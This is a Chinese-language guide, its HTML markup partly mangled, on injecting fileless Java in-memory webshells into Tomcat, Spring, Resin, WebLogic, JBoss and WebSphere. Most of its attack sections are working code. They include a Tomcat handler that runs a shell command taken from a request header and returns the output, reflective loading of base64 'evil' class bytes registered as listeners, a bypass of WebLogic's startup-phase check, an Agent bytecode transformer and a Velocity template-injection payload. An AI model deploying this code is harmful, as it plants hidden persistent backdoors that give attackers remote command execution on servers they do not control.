Java内存马深度解析与实战指南<\/h1>

1. 前言<\/h2>

Java内存马注入技术主要分为两种类型：<\/p>

动态注册方式<\/strong>：添加新的listener\/filter\/servlet\/controller等组件<\/li>

Agent注入方式<\/strong>：修改已有class，插入恶意代码<\/li> <\/ol>
在理解内存马注入前，需要掌握以下核心概念：<\/p>

类加载机制<\/li>
双亲委派问题及context<\/li>
类反射机制<\/li> <\/ul>
2. 基础理论<\/h2>
2.1 Class对象<\/h3>
Java中的对象分为两种：<\/p>

Class对象<\/strong>：保存类型运行时信息（类名、属性、方法、父类等）<\/li>
实例对象<\/strong>：类的具体实例<\/li> <\/ul>
关键特性：<\/p>

JVM中一个类只对应一个Class对象<\/li>
Class对象是java.lang.Class类的对象<\/li>
类加载时由JVM自动构造，不能显式声明<\/li> <\/ul>
2.2 类加载机制<\/h3>
类加载的三个阶段：<\/p>

加载<\/strong>：<\/p>

由ClassLoader执行<\/li>
获取类的二进制字节流<\/li>
将字节流转换为方法区的运行时数据结构<\/li>
在堆中生成对应的Class对象<\/li> <\/ul> <\/li>

链接<\/strong>：<\/p>

验证字节流<\/li>
为静态域分配存储空间<\/li>
将符号引用转为直接引用<\/li> <\/ul> <\/li>

初始化<\/strong>：<\/p>

执行静态初始化器和静态代码块<\/li>
优先初始化父类<\/li> <\/ul> <\/li> <\/ol>
类加载触发方式：<\/p>

Class.forName("类的全限定名")<\/code><\/li>
new<\/code>操作符<\/li>
通过网络加载字节码<\/li> <\/ul> 关键方法：<\/p> loadClass<\/code>：使用双亲委派机制查找类<\/li> findClass<\/code>：根据名称\/位置加载.class字节码<\/li> defineClass<\/code>：解析.class字节流，返回Class对象<\/li> <\/ul> 2.3 类反射<\/h3> 获取Class对象的三种方式：<\/p> Person.class<\/code><\/li> person.getClass()<\/code><\/li> Class.forName("com.example.Person")<\/code><\/li> <\/ol> 反射操作：<\/p> Method操作<\/strong>：<\/p> getDeclaredMethods()<\/code>：获取所有方法（包括私有）<\/li> getMethod()<\/code>：获取公共方法（包括父类）<\/li> method.invoke(obj, args)<\/code>：调用方法<\/li> <\/ul> <\/li> Field操作<\/strong>：<\/p> getField(fieldName)<\/code><\/li> field.get(obj)<\/code> \/ field.set(obj, val)<\/code><\/li> 修改final字段需先移除FINAL约束<\/li> <\/ul> <\/li> <\/ul> 2.4 双亲委派机制<\/h3> 作用：<\/p> 保证相同class文件加载为相同对象<\/li> 防止核心类被篡改<\/li> <\/ul> 打破双亲委派的方式：<\/p> 继承ClassLoader并重写loadClass<\/code>方法<\/li> 直接使用defineClass<\/code>绕过<\/li> <\/ol> Tomcat的特殊处理：<\/p> 需要隔离不同应用的类库<\/li> 支持热加载JSP文件<\/li> 自定义类加载器层级： CommonClassLoader<\/li> CatalinaClassLoader<\/li> SharedClassLoader<\/li> WebappClassLoader<\/li> JspClassLoader<\/li> <\/ul> <\/li> <\/ul> 3. 动态注册方式注入<\/h2> 通用思路<\/h3> 分析处理请求的对象，阅读源码确认能否控制请求\/响应<\/li> 研究对象注册到内存的流程<\/li> 模拟注册过程<\/li> <\/ol> 关键问题解决：<\/p> 类加载隔离<\/strong>：使用当前上下文的类加载器创建新类加载器 new<\/span> javax.<\/span>management<\/span>.<\/span>loading<\/span>.<\/span>MLet<\/span>(<\/span>new<\/span> java.<\/span>net<\/span>.<\/span>URL<\/span>[<\/span>0<\/span>],<\/span> conreq.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>())<\/span> <\/span><\/span><\/code><\/pre><\/li> 版本适配<\/strong>：研究中间件不同版本的实现差异<\/li> <\/ul> 3.1 Tomcat内存马<\/h3> 获取Request对象<\/h4> Tomcat 5-9通用方法：<\/p> public<\/span> static<\/span> void<\/span> echo<\/span>()<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Object o;<\/span> <\/span><\/span> Object resp =<\/span> null<\/span>;<\/span> <\/span><\/span> boolean<\/span> done =<\/span> false<\/span>;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Thread[]<\/span> threads =<\/span> (<\/span>Thread[])<\/span> Thread.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"getThreads"<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>);<\/span> <\/span><\/span> for<\/span> (<\/span>Thread thread :<\/span> threads)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>thread.<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"ContainerBackgroundProcessor"<\/span>)<\/span> ||<\/span> <\/span><\/span> (!<\/span>thread.<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"exec"<\/span>)<\/span> &&<\/span> thread.<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"http"<\/span>)))<\/span> {<\/span> <\/span><\/span> o =<\/span> getFieldValue(<\/span>thread,<\/span> "target"<\/span>);<\/span> <\/span><\/span> if<\/span> (!(<\/span>o instanceof<\/span> Runnable))<\/span> continue<\/span>;<\/span> <\/span><\/span> <\/span><\/span> \/\/ Tomcat 5\/6\/7 <\/span><\/span><\/span><\/span> Object connectionHandler =<\/span> getFieldValue(<\/span>getFieldValue(<\/span>connector,<\/span> "protocolHandler"<\/span>),<\/span> "cHandler"<\/span>);<\/span> <\/span><\/span> \/\/ Tomcat 8\/9 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>connectionHandler ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> connectionHandler =<\/span> getFieldValue(<\/span>getFieldValue(<\/span>connector,<\/span> "protocolHandler"<\/span>),<\/span> "handler"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> ArrayList processors =<\/span> (<\/span>ArrayList)<\/span> getFieldValue(<\/span>getFieldValue(<\/span>connectionHandler,<\/span> "global"<\/span>),<\/span> "processors"<\/span>);<\/span> <\/span><\/span> for<\/span> (<\/span>Object processor :<\/span> processors)<\/span> {<\/span> <\/span><\/span> Object req =<\/span> getFieldValue(<\/span>processor,<\/span> "req"<\/span>);<\/span> <\/span><\/span> String s =<\/span> (<\/span>String)<\/span> req.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getHeader"<\/span>,<\/span> String.<\/span>class<\/span>).<\/span>invoke<\/span>(<\/span>req,<\/span> "Accept-Encoded"<\/span>);<\/span> <\/span><\/span> if<\/span> (<\/span>s !=<\/span> null<\/span> &&<\/span> !<\/span>s.<\/span>isEmpty<\/span>())<\/span> {<\/span> <\/span><\/span> Object conreq =<\/span> req.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getNote"<\/span>,<\/span> int<\/span>.<\/span>class<\/span>).<\/span>invoke<\/span>(<\/span>req,<\/span> 1<\/span>);<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> resp =<\/span> conreq.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getResponse"<\/span>).<\/span>invoke<\/span>(<\/span>conreq);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> resp =<\/span> getFieldValue(<\/span>getFieldValue(<\/span>conreq,<\/span> "request"<\/span>),<\/span> "response"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 设置响应 <\/span><\/span><\/span><\/span> resp.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"setStatus"<\/span>,<\/span> int<\/span>.<\/span>class<\/span>).<\/span>invoke<\/span>(<\/span>resp,<\/span> 200<\/span>);<\/span> <\/span><\/span> resp.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"addHeader"<\/span>,<\/span> String.<\/span>class<\/span>,<\/span> String.<\/span>class<\/span>)<\/span> <\/span><\/span> .<\/span>invoke<\/span>(<\/span>resp,<\/span> "Transfer-encoded"<\/span>,<\/span> "chunked"<\/span>);<\/span> <\/span><\/span> done =<\/span> true<\/span>;<\/span> <\/span><\/span> <\/span><\/span> \/\/ 执行命令 <\/span><\/span><\/span><\/span> byte<\/span>[]<\/span> cmdBytes;<\/span> <\/span><\/span> if<\/span> (<\/span>s.<\/span>equals<\/span>(<\/span>"echo"<\/span>))<\/span> {<\/span> <\/span><\/span> cmdBytes =<\/span> System.<\/span>getProperties<\/span>().<\/span>toString<\/span>().<\/span>getBytes<\/span>();<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> String[]<\/span> cmd =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"window"<\/span>)<\/span> ?<\/span> <\/span><\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> s}<\/span> :<\/span> new<\/span> String[]{<\/span>"\/bin\/sh"<\/span>,<\/span> "-c"<\/span>,<\/span> s};<\/span> <\/span><\/span> cmdBytes =<\/span> new<\/span> Scanner(<\/span>new<\/span> ProcessBuilder(<\/span>cmd).<\/span>start<\/span>().<\/span>getInputStream<\/span>())<\/span> <\/span><\/span> .<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>).<\/span>next<\/span>().<\/span>getBytes<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> writeBody(<\/span>resp,<\/span> new<\/span> String(<\/span>cmdBytes));<\/span> <\/span><\/span> }<\/span> <\/span><\/span> if<\/span> (<\/span>done)<\/span> break<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception ex)<\/span> {<\/span> <\/span><\/span> writeBody(<\/span>resp,<\/span> ex.<\/span>toString<\/span>());<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>获取Context<\/h4> private<\/span> static<\/span> Object getContext<\/span>(<\/span>Object request)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Object context =<\/span> null<\/span>;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> context =<\/span> getFieldValue(<\/span>request,<\/span> "context"<\/span>);<\/span> \/\/ all <\/span><\/span><\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> context =<\/span> invoke(<\/span>request,<\/span> "getContext"<\/span>);<\/span> \/\/ tomcat6 <\/span><\/span><\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception ignored)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> context =<\/span> invoke(<\/span>request,<\/span> "getServletContext"<\/span>);<\/span> \/\/ tomcat7+ <\/span><\/span><\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception ignored1)<\/span> {<\/span> <\/span><\/span> context =<\/span> invoke(<\/span>request,<\/span> "getWebApp"<\/span>);<\/span> \/\/ resin3 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> context;<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ 获取StandardContext <\/span><\/span><\/span><\/span>Object applicationContextFacade =<\/span> getContext(<\/span>request);<\/span> <\/span><\/span>Object applicationContext =<\/span> getFieldValue(<\/span>applicationContextFacade,<\/span> "context"<\/span>);<\/span> <\/span><\/span>Object standardContext =<\/span> getFieldValue(<\/span>applicationContext,<\/span> "context"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>添加Listener<\/h4> getMethodByClass(<\/span>standardContext.<\/span>getClass<\/span>(),<\/span> "setApplicationEventListeners"<\/span>,<\/span> Object[].<\/span>class<\/span>)<\/span> <\/span><\/span> .<\/span>invoke<\/span>(<\/span>standardContext,<\/span> new<\/span> Object[]{<\/span>newListeners.<\/span>toArray<\/span>()});<\/span> <\/span><\/span><\/code><\/pre>3.2 半自动化挖掘技术<\/h3> 使用工具java-object-searcher<\/a>：<\/p> 将jar包引入目标应用的classpath或JDK的ext目录<\/li> 编写搜索代码：<\/li> <\/ol> \/\/ 设置搜索类型 <\/span><\/span><\/span><\/span>List<<\/span>Keyword><\/span> keys =<\/span> new<\/span> ArrayList<>();<\/span> <\/span><\/span>keys.<\/span>add<\/span>(<\/span>new<\/span> Keyword.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"listener"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span> <\/span><\/span>\/\/ 定义黑名单 <\/span><\/span><\/span><\/span>List<<\/span>Blacklist><\/span> blacklists =<\/span> new<\/span> ArrayList<>();<\/span> <\/span><\/span>blacklists.<\/span>add<\/span>(<\/span>new<\/span> Blacklist.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"java.io.File"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span>blacklists.<\/span>add<\/span>(<\/span>new<\/span> Blacklist.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"Exception"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span>blacklists.<\/span>add<\/span>(<\/span>new<\/span> Blacklist.<\/span>Builder<\/span>().<\/span>setField_name<\/span>(<\/span>"contextClassLoader"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span> <\/span><\/span>\/\/ 创建搜索器 <\/span><\/span><\/span><\/span>SearchRequstByBFS searcher =<\/span> new<\/span> SearchRequstByBFS(<\/span>Thread.<\/span>currentThread<\/span>(),<\/span> keys);<\/span> <\/span><\/span>searcher.<\/span>setBlacklists<\/span>(<\/span>blacklists);<\/span> <\/span><\/span>searcher.<\/span>setIs_debug<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>searcher.<\/span>setMax_search_depth<\/span>(<\/span>10<\/span>);<\/span> <\/span><\/span>searcher.<\/span>setReport_save_path<\/span>(<\/span>"."<\/span>);<\/span> <\/span><\/span>searcher.<\/span>searchObject<\/span>();<\/span> <\/span><\/span><\/code><\/pre>3.3 Spring内存马<\/h3> Object requestAttributes =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.web.context.request.RequestContextHolder"<\/span>)<\/span> <\/span><\/span> .<\/span>getMethod<\/span>(<\/span>"getRequestAttributes"<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>);<\/span> <\/span><\/span>Object httprequest =<\/span> requestAttributes.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getRequest"<\/span>).<\/span>invoke<\/span>(<\/span>requestAttributes);<\/span> <\/span><\/span>Object httpresponse =<\/span> requestAttributes.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getResponse"<\/span>).<\/span>invoke<\/span>(<\/span>requestAttributes);<\/span> <\/span><\/span>Object servletContext =<\/span> httprequest.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getServletContext"<\/span>).<\/span>invoke<\/span>(<\/span>requestAttributes);<\/span> <\/span><\/span><\/code><\/pre>3.4 Resin内存马<\/h3> Resin 4<\/h4> Object servletContext =<\/span> invoke(<\/span>httprequest,<\/span> "getServletContext"<\/span>);<\/span> <\/span><\/span>Object webApp =<\/span> servletContext;<\/span> <\/span><\/span>Method addListenerObjectM =<\/span> getMethodByClass(<\/span>webApp.<\/span>getClass<\/span>(),<\/span> "addListenerObject"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> boolean<\/span>.<\/span>class<\/span>});<\/span> <\/span><\/span> <\/span><\/span>\/\/ 动态加载恶意类 <\/span><\/span><\/span><\/span>Method m =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span> <\/span><\/span>m.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>Class clazz =<\/span> (<\/span>Class)<\/span> m.<\/span>invoke<\/span>(<\/span>new<\/span> javax.<\/span>management<\/span>.<\/span>loading<\/span>.<\/span>MLet<\/span>(<\/span>new<\/span> java.<\/span>net<\/span>.<\/span>URL<\/span>[<\/span>0<\/span>],<\/span> <\/span><\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>()),<\/span> clazzBytes,<\/span> 0<\/span>,<\/span> clazzBytes.<\/span>length<\/span>);<\/span> <\/span><\/span> <\/span><\/span>Object listener =<\/span> clazz.<\/span>newInstance<\/span>();<\/span> <\/span><\/span>addListenerObjectM.<\/span>invoke<\/span>(<\/span>webApp,<\/span> new<\/span> Object[]{<\/span>listener,<\/span> true<\/span>});<\/span> <\/span><\/span><\/code><\/pre>Resin 3<\/h4> 区别点：<\/p> 获取WebApp方式：getWebApp<\/code>而非getServletContext<\/code><\/li> Request实现类：com.caucho.server.http.HttpRequest<\/code><\/li> <\/ul> 3.5 WebLogic内存马<\/h3> 12.1.3+版本<\/h4> Object currentWork =<\/span> ((<\/span>ExecuteThread)<\/span>Thread.<\/span>currentThread<\/span>()).<\/span>getCurrentWork<\/span>();<\/span> <\/span><\/span>Field connectionHandler =<\/span> currentWork.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"connectionHandler"<\/span>);<\/span> <\/span><\/span>connectionHandler.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>Object httpConnectionHandler =<\/span> connectionHandler.<\/span>get<\/span>(<\/span>currentWork);<\/span> <\/span><\/span> <\/span><\/span>Field requestF =<\/span> httpConnectionHandler.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"request"<\/span>);<\/span> <\/span><\/span>requestF.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>httpConnectionHandler =<\/span> requestF.<\/span>get<\/span>(<\/span>httpConnectionHandler);<\/span> <\/span><\/span> <\/span><\/span>Field contextF =<\/span> httpConnectionHandler.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span> <\/span><\/span>contextF.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>WebAppServletContext webAppServletContext =<\/span> (<\/span>WebAppServletContext)<\/span> contextF.<\/span>get<\/span>(<\/span>httpConnectionHandler);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 动态加载恶意类 <\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> evilClassBytes =<\/span> new<\/span> BASE64Decoder().<\/span>decodeBuffer<\/span>(<\/span>"yv66..."<\/span>);<\/span> <\/span><\/span>Method defineClass =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> Integer.<\/span>TYPE<\/span>,<\/span> Integer.<\/span>TYPE<\/span>);<\/span> <\/span><\/span>defineClass.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> <\/span><\/span>Field classLoaderF =<\/span> webAppServletContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"classLoader"<\/span>);<\/span> <\/span><\/span>classLoaderF.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>ClassLoader classLoader =<\/span> (<\/span>ClassLoader)<\/span> classLoaderF.<\/span>get<\/span>(<\/span>webAppServletContext);<\/span> <\/span><\/span>Class servletClass =<\/span> (<\/span>Class)<\/span> defineClass.<\/span>invoke<\/span>(<\/span>classLoader,<\/span> evilClassBytes,<\/span> 0<\/span>,<\/span> evilClassBytes.<\/span>length<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 绕过启动检查 <\/span><\/span><\/span><\/span>Field phaseF =<\/span> webAppServletContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"phase"<\/span>);<\/span> <\/span><\/span>phaseF.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>Object INITIALIZER_STARTUP =<\/span> Class.<\/span>forName<\/span>(<\/span>"weblogic.servlet.internal.WebAppServletContext$ContextPhase"<\/span>)<\/span> <\/span><\/span> .<\/span>getDeclaredField<\/span>(<\/span>"INITIALIZER_STARTUP"<\/span>).<\/span>get<\/span>(<\/span>null<\/span>);<\/span> <\/span><\/span>Object START =<\/span> Class.<\/span>forName<\/span>(<\/span>"weblogic.servlet.internal.WebAppServletContext$ContextPhase"<\/span>)<\/span> <\/span><\/span> .<\/span>getDeclaredField<\/span>(<\/span>"START"<\/span>).<\/span>get<\/span>(<\/span>null<\/span>);<\/span> <\/span><\/span>Object OldContextPhase =<\/span> phaseF.<\/span>get<\/span>(<\/span>webAppServletContext);<\/span> <\/span><\/span> <\/span><\/span>phaseF.<\/span>set<\/span>(<\/span>webAppServletContext,<\/span> INITIALIZER_STARTUP);<\/span> <\/span><\/span>webAppServletContext.<\/span>registerListener<\/span>(<\/span>"evil.listener.testCmdListener"<\/span>);<\/span> <\/span><\/span>phaseF.<\/span>set<\/span>(<\/span>webAppServletContext,<\/span> START);<\/span> <\/span><\/span><\/code><\/pre>3.6 JBoss内存马<\/h3> JBoss AS6.1可直接复用Tomcat的listener内存马，因其内嵌了Tomcat。<\/p> 3.7 WebSphere内存马<\/h3> 获取Context方法<\/h4> 通过Thread.currentThread()定位：<\/li> <\/ol> Object obj0 =<\/span> Thread.<\/span>currentThread<\/span>();<\/span> <\/span><\/span>Object obj1 =<\/span> getFieldValue(<\/span>obj0,<\/span> "wsThreadLocals"<\/span>);<\/span> <\/span><\/span>Object[]<\/span> wsThreadLocals =<\/span> (<\/span>Object[])<\/span> obj1;<\/span> <\/span><\/span> <\/span><\/span>for<\/span> (<\/span>Object obj2 :<\/span> wsThreadLocals)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>obj2 !=<\/span> null<\/span> &&<\/span> obj2.<\/span>getClass<\/span>().<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"FastStack"<\/span>))<\/span> {<\/span> <\/span><\/span> Object obj3 =<\/span> getFieldValue(<\/span>obj2,<\/span> "stack"<\/span>);<\/span> <\/span><\/span> Object[]<\/span> stack =<\/span> (<\/span>Object[])<\/span> obj3;<\/span> <\/span><\/span> for<\/span> (<\/span>Object obj4 :<\/span> stack)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>obj4 !=<\/span> null<\/span> &&<\/span> obj4.<\/span>getClass<\/span>().<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"WebComponentMetaDataImpl"<\/span>))<\/span> {<\/span> <\/span><\/span> Object obj5 =<\/span> getFieldValue(<\/span>obj4,<\/span> "config"<\/span>);<\/span> <\/span><\/span> Object obj6 =<\/span> getFieldValue(<\/span>obj5,<\/span> "context"<\/span>);<\/span> \/\/ ServletContextFacade <\/span><\/span><\/span><\/span> Object obj7 =<\/span> getFieldValue(<\/span>obj6,<\/span> "context"<\/span>);<\/span> \/\/ WebAppImpl <\/span><\/span><\/span><\/span> return<\/span> obj7;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 全局方法获取：<\/li> <\/ol> Object webContainer =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.ibm.ws.webcontainer.WebContainer"<\/span>,<\/span> true<\/span>,<\/span> classloader)<\/span> <\/span><\/span> .<\/span>getMethod<\/span>(<\/span>"getWebContainer"<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>);<\/span> <\/span><\/span>Object requestMapper =<\/span> getFieldValue(<\/span>webContainer,<\/span> "requestMapper"<\/span>);<\/span> <\/span><\/span>Object webGroup =<\/span> invoke(<\/span>requestMapper,<\/span> "map"<\/span>,<\/span> new<\/span> Object[]{<\/span>":9080\/app\/*"<\/span>});<\/span> <\/span><\/span>Object webapp =<\/span> getFieldValue(<\/span>webGroup,<\/span> "webApp"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>内存马注入<\/h4> byte<\/span>[]<\/span> classBytes =<\/span> new<\/span> BASE64Decoder().<\/span>decodeBuffer<\/span>(<\/span>"yv66..."<\/span>);<\/span> <\/span><\/span>Method defineClassMethod =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> <\/span><\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span> <\/span><\/span>defineClassMethod.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> <\/span><\/span>Class cc =<\/span> (<\/span>Class)<\/span> defineClassMethod.<\/span>invoke<\/span>(<\/span> <\/span><\/span> new<\/span> java.<\/span>security<\/span>.<\/span>SecureClassLoader<\/span>(<\/span>Thread.<\/span>currentThread<\/span>().<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>()),<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>classBytes,<\/span> 0<\/span>,<\/span> classBytes.<\/span>length<\/span>});<\/span> <\/span><\/span> <\/span><\/span>((<\/span>WebGroupImpl)<\/span>WebContainer.<\/span>getWebContainer<\/span>().<\/span>requestMapper<\/span>.<\/span>map<\/span>(<\/span>":9080\/app\/*"<\/span>))<\/span> <\/span><\/span> .<\/span>webApp<\/span>.<\/span>addLifecycleListener<\/span>(((<\/span>EventListener)<\/span>cc.<\/span>newInstance<\/span>());<\/span> <\/span><\/span><\/code><\/pre>4. Agent注入方式<\/h2> Agent注入通过修改已有class字节码实现，关键步骤：<\/p> 获取Instrumentation实例<\/li> 使用ClassFileTransformer转换目标类<\/li> 插入恶意字节码<\/li> <\/ol> 示例代码结构：<\/p> public<\/span> class<\/span> Agent<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> agentmain<\/span>(<\/span>String args,<\/span> Instrumentation inst)<\/span> {<\/span> <\/span><\/span> inst.<\/span>addTransformer<\/span>(<\/span>new<\/span> ClassFileTransformer()<\/span> {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> byte<\/span>[]<\/span> transform<\/span>(<\/span>ClassLoader loader,<\/span> String className,<\/span> <\/span><\/span> Class<?><\/span> classBeingRedefined,<\/span> ProtectionDomain protectionDomain,<\/span> <\/span><\/span> byte<\/span>[]<\/span> classfileBuffer)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>targetClass.<\/span>equals<\/span>(<\/span>className))<\/span> {<\/span> <\/span><\/span> \/\/ 修改字节码 <\/span><\/span><\/span><\/span> return<\/span> modifyClass(<\/span>classfileBuffer);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> },<\/span> true<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5. 实用技巧<\/h2> 5.1 SSTI利用<\/h3> Velocity模板注入示例：<\/p> #set($s="") #set($evil="b64xxxxx") #set($evilb=$s.getClass().forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer($evil)) #set($ReflectUtils=$s.getClass().forName("org.springframework.cglib.core.ReflectUtils").getDeclaredConstructor()) #set($classLoader=$s.getClass().forName("java.lang.Thread").currentThread().getContextClassLoader()) $ReflectUtils.setAccessible(true) #set($ReflectUtilsObject=$ReflectUtils.newInstance()) #set($_=$ReflectUtilsObject.defineClass("Payload", $evilb, $classLoader)) #set($shellServlet=$classLoader.loadClass("Payload").newInstance()) <\/code><\/pre> 5.2 远程调试配置<\/h3> JDK版本<\/th> 参数<\/th> <\/tr> <\/thead> JDK5-8<\/td> -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005<\/code><\/td> <\/tr> JDK9+<\/td> -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005<\/code><\/td> <\/tr> <\/tbody> <\/table> 全局环境变量方式：<\/p> set<\/span> JAVA_TOOL_OPTIONS=-Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,address=9999,server=y,suspend=n <\/span><\/span><\/code><\/pre>5.3 内存Class Dump<\/h3> 使用dumpclass<\/a>工具：<\/p> "C:\Java\jdk1.8.0_212\bin\java.exe"<\/span> -jar dumpclass.jar -p 10820<\/span> com.example.TargetClass <\/span><\/span><\/code><\/pre>6. 参考资源<\/h2> Java类加载机制详解<\/a><\/li> Resin内存马研究<\/a><\/li> Java内存马攻防实战<\/a><\/li> <\/ol>